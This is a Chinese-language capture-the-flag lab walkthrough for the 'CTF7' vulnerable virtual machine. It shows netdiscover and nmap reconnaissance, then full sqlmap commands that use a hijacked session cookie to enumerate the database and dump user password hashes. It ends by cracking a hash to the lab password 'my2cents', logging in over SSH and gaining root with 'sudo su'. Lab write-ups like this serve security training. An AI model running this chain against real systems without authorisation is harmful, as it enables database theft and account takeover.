CTF7靶机渗透训练

CTF7靶机训练

  • 环境下载
  • 主机发现
  • 端口扫描
  • 查看服务器信息
  • 漏洞发现
  • 漏洞挖掘

环境下载

链接:https://pan.baidu.com/s/17IdF-74o278axL3Zj2V68A
提取码:kisb
Tips:首次打开虚拟机时要选择“我已移动该虚拟机”选项。
此次训练其中一步为获取目标的账号密码,故目标环境无需登录。

主机发现

使用命令:

netdiscover

CTF7靶机渗透训练_第1张图片
CTF7靶机渗透训练_第2张图片

端口扫描

使用命令:

namp -A -sS -sV -p- 目标主机IP

参数说明:
-A:详细扫描目标IP,加载所有脚本,尽可能地全面地探测信息。
-v:显示详细的扫描过程。
-sS:TCP SYN 扫描。
-sV:探测开放。
-p-:扫描全部端口。
CTF7靶机渗透训练_第3张图片
扫描得出目标开放了端口:22(SSH服务),80(HTTP服务),139(SAMBA服务),901(HTTP的SAMBA服务),8080(HTTP服务),10000(HTTP服务)。

查看服务器信息

用chrome浏览器访问靶机,通过wappalyzer插件获得信息:
CTF7靶机渗透训练_第4张图片

漏洞发现

尝试寻找SQL注入点
CTF7靶机渗透训练_第5张图片
但未登录前不能查看该网页信息,所以要先注册一个自己的账号并登录
CTF7靶机渗透训练_第6张图片
使用以下命令进行漏洞挖掘:

sqlmap -u "http://靶机IP/newsletter&id=1" -p id --cookie="PHPSESSID=此时该页面cookie"

在这里插入图片描述
如何获取cookie:
在页面内按F12,输入document.cookie即可查看
CTF7靶机渗透训练_第7张图片
经过渗透得出以下漏洞:
CTF7靶机渗透训练_第8张图片
选择红色框的一条URL进行测试,发现页面明显延迟
CTF7靶机渗透训练_第9张图片

漏洞挖掘

使用以下命令爆出数据库名:

sqlmap -u "http://靶机IP/newsletter&id=1" -p id --cookie="PHPSESSID=此时该页面cookie" --dbs

在这里插入图片描述
在这里插入图片描述
使用以下命令爆出表名:

sqlmap -u "http://靶机IP/newsletter&id=1" -p id --cookie="PHPSESSID=此时该页面cookie" --dbs -D website --tables

在这里插入图片描述
CTF7靶机渗透训练_第10张图片
使用以下命令爆出字段名:

sqlmap -u "http://靶机IP/newsletter&id=1" -p id --cookie="PHPSESSID=此时该页面cookie" --dbs -D website --tables -T users --columns

在这里插入图片描述
CTF7靶机渗透训练_第11张图片
使用以下命令爆出用户名密码等数据:

sqlmap -u "http://靶机IP/newsletter&id=1" -p id --cookie="PHPSESSID=此时该页面cookie" --dbs -D website --tables -T users --columns -C password,username --dump

在这里插入图片描述
CTF7靶机渗透训练_第12张图片
得到用户名和密码,解析不出来的可以去网上找MD5的解析器自行解析,如选第一个密码自行解析得出明文密码为:my2cents
CTF7靶机渗透训练_第13张图片
尝试SSH靶机,登录成功(第一次尝试登录时会出现一个yes/no的选项,需要输入yes),尝试使用"sudo su"提权,提权成功。
在这里插入图片描述

你可能感兴趣的:(CTF7靶机渗透训练)